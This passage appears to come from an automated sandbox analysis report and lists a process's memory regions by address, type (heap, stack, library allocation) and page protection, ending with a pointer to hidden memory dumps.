page read and write
2B6C000
heap
page read and write
47BC000
heap
page read and write
47D3000
heap
page read and write
8640000
trusted library allocation
page read and write
47AA000
heap
page read and write
2B6B000
heap
page read and write
31C0000
heap
page read and write
47D6000
heap
page read and write
4E10000
heap
page execute and read and write
32A6000
heap
page read and write
47D4000
heap
page read and write
2B6B000
heap
page read and write
30BB000
heap
page read and write
4D31000
heap
page read and write
47AA000
heap
page read and write
30BB000
heap
page read and write
31E0000
heap
page read and write
4D18000
heap
page read and write
502F000
stack
page read and write
47CE000
heap
page read and write
2D46000
heap
page read and write
3564000
heap
page read and write
4C56000
heap
page read and write
5221000
heap
page read and write
47C8000
heap
page read and write
47AD000
heap
page read and write
368C000
heap
page read and write
2B60000
heap
page read and write
327B000
heap
page read and write
47D6000
heap
page read and write
47BA000
heap
page read and write
47CC000
heap
page read and write
30B0000
heap
page read and write
47C7000
heap
page read and write
45C000
system
page execute and read and write
47D7000
heap
page read and write
47C1000
heap
page read and write
47CC000
heap
page read and write
8631000
trusted library allocation
page read and write
30A0000
heap
page read and write
47B8000
heap
page read and write
2B6B000
heap
page read and write
368C000
heap
page read and write
47D7000
heap
page read and write
47CC000
heap
page read and write
FB4000
trusted library allocation
page read and write
30BB000
heap
page read and write
4D31000
heap
page read and write
4D31000
heap
page read and write
8290000
heap
page read and write
3223000
heap
page read and write
4D31000
heap
page read and write
5030000
trusted library allocation
page read and write
76CE000
trusted library allocation
page read and write
3561000
heap
page read and write
8999000
trusted library allocation
page read and write
4D31000
heap
page read and write
48F5000
trusted library allocation
page execute and read and write
2B20000
heap
page readonly
4DED000
heap
page read and write
4D31000
heap
page read and write
4DAE000
stack
page read and write
5A6D000
trusted library allocation
page read and write
47CC000
heap
page read and write
4EC0000
trusted library allocation
page read and write
47CE000
heap
page read and write
48D9000
trusted library allocation
page read and write
2CAF000
stack
page read and write
2B6C000
heap
page read and write
47AB000
heap
page read and write
47BC000
heap
page read and write
2CFC000
stack
page read and write
4D31000
heap
page read and write
48E7000
trusted library allocation
page execute and read and write
8458000
heap
page read and write
B40E000
stack
page read and write
4784000
heap
page read and write
31D0000
heap
page read and write
4E7C000
stack
page read and write
47D3000
heap
page read and write
A45B000
trusted library allocation
page read and write
47DF000
heap
page read and write
47D9000
heap
page read and write
66EE000
trusted library allocation
page read and write
30BB000
heap
page read and write
47DA000
heap
page read and write
32D2000
heap
page read and write
30BB000
heap
page read and write
2FD3000
heap
page read and write
EFE000
stack
page read and write
47CC000
heap
page read and write
47AC000
heap
page read and write
47CE000
heap
page read and write
838E000
stack
page read and write
7870000
trusted library allocation
page read and write
8C5C000
stack
page read and write
75E2000
heap
page read and write
47C7000
heap
page read and write
7566000
heap
page read and write
2B6C000
heap
page read and write
47BC000
heap
page read and write
2B30000
heap
page read and write
47CC000
heap
page read and write
4D31000
heap
page read and write
32C1000
heap
page read and write
5221000
heap
page read and write
47D4000
heap
page read and write
2CEE000
stack
page read and write
2B6B000
heap
page read and write
33C0000
heap
page read and write
2FDE000
heap
page read and write
4D31000
heap
page read and write
4D31000
heap
page read and write
4E20000
trusted library section
page read and write
47B1000
heap
page read and write
2DFC000
stack
page read and write
5030000
trusted library allocation
page read and write
2B6B000
heap
page read and write
776E000
stack
page read and write
8700000
trusted library allocation
page read and write
8BDB000
stack
page read and write
86F0000
trusted library allocation
page read and write
47BC000
heap
page read and write
47C9000
heap
page read and write
2B6B000
heap
page read and write
6C36000
trusted library allocation
page read and write
279C000
stack
page read and write
48EA000
trusted library allocation
page execute and read and write
47D7000
heap
page read and write
30BB000
heap
page read and write
47C2000
heap
page read and write
7680000
trusted library allocation
page read and write
47D7000
heap
page read and write
75E9000
heap
page read and write
4F79000
trusted library allocation
page read and write
7F780000
trusted library allocation
page execute and read and write
47BD000
heap
page read and write
47AB000
heap
page read and write
2B6B000
heap
page read and write
AA80000
trusted library allocation
page read and write
7610000
heap
page execute and read and write
47AC000
heap
page read and write
4D31000
heap
page read and write
47D3000
heap
page read and write
60B9000
trusted library allocation
page read and write
2B6B000
heap
page read and write
F90000
trusted library section
page read and write
30BB000
heap
page read and write
47C9000
heap
page read and write
FA0000
trusted library allocation
page read and write
97C000
stack
page read and write
6A82000
trusted library allocation
page execute and read and write
7850000
trusted library allocation
page read and write
2BAD000
stack
page read and write
There are 551 hidden memdumps, click here to show them.